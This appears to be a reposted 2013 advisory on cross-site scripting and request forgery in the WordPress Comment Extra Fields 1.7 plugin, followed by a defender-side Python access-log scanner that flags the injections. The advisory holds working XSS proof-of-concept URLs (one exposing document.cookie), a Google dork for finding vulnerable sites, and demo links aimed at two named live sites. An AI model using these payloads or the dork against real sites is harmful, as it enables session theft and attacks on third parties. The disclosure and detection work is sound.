WordPress Comment Extra Fields 1.7 CSRF / XSS

WordPress Comment Extra Fields plugin version 1.7 suffers from cross site request forgery and cross site scripting vulnerabilities.

Quote:
##################################################
# Description : Wordpress Plugins - Comment Extra Fields <== XSS
# Version : 1.7
# Link : https://wordpress.org/extend/plugins/...t-extra-field/
# Plugins : https://downloads.wordpress.org/plugi...-field.1.7.zip
# Date : 8-1-2013
# Google Dork : inurl:/wp-content/plugins/comment-extra-field/
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################


# Description :
================
JavaScript code injection (XSRF/XSS).
A remote attacker can include remote images or execute some JS code.


# PoC
=====
=> XSRF/XSS Injection :
http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS');//
http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a
href='javascript:alert(document.cookie)'>Click me</a>


# Demo:
=======
https://cscmail.net/wp-content/plugins/c...tonText=<a
href='javascript:alert(document.cookie)'>Click me</a>
https://fitest.sitewalla.com/wp-content/...tonText=<a
href='javascript:alert(document.cookie)'>Click me</a>
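As an added, defender-side example that is not part of the advisory or the forum post: a small Python scanner that reads web server access-log lines and flags requests to the plugin's swfupload.swf whose movieName or buttonText parameter carries injected HTML or JavaScript, which is the vector the advisory describes. The plugin path and the two parameter names come from the advisory; the combined-format log parsing, the sample log lines and the "suspicious characters" heuristic are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names are taken from the advisory; everything else below is an assumption.
SWFUPLOAD_PATH = re.compile(r"/wp-content/plugins/comment-extra-field/scripts/swfupload\.swf$", re.I)
WATCHED_PARAMS = ("movieName", "buttonText")

# Heuristic: a legitimate movieName is a JavaScript identifier and a legitimate buttonText is a
# plain label, so quotes, brackets, semicolons, javascript: URLs, alert( or on*= handlers in
# either value indicate an injection attempt.
SUSPICIOUS = re.compile(r"""[<>"'();]|javascript:|alert\(|\bon\w+=""", re.I)

# Apache/nginx combined-format access-log line (only the fields this check needs).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic): one benign plugin request, one unrelated
# request, and the two injected parameters from the advisory, percent-encoded the way a web
# server records them.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jan/2013:10:01:02 +0000] "GET /wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12432 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Jan/2013:10:01:03 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 52 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jan/2013:10:05:41 +0000] "GET /wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName=%22%5D%29%3B%7Dcatch%28e%29%7B%7Dif%28%21self.a%29self.a%3D%21alert%28%27XSS%27%29%3B%2F%2F HTTP/1.1" 200 12432 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jan/2013:10:05:42 +0000] "GET /wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=%3Ca+href%3D%27javascript%3Aalert%28document.cookie%29%27%3EClick+me%3C%2Fa%3E HTTP/1.1" 200 12432 "-" "Mozilla/5.0"
"""


def inspect_target(target):
    """Return (param, decoded_value) when `target` is a swfupload.swf request whose
    movieName or buttonText carries injected HTML/JavaScript, otherwise None."""
    parts = urlsplit(target)
    if not SWFUPLOAD_PATH.search(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if SUSPICIOUS.search(value):
                return name, value
    return None


def scan_log(text):
    """Parse access-log text and return one finding per injected swfupload.swf request."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hit = inspect_target(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "param": hit[0], "value": hit[1]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} injected {f['param']}: {f['value']!r}")
```

Run against a real log, the script reports the source IP and timestamp of each request that carries an injected movieName or buttonText, which is the evidence needed to decide whether the vulnerable file was actually probed. The heuristic is deliberately conservative for movieName (any non-identifier character is flagged), so tune it on your own traffic before alerting on it; and since the Flash file is only reachable because the plugin ships it, denying requests to that path at the web server, or removing the file where uploads are not used, takes the whole vector away regardless of payload.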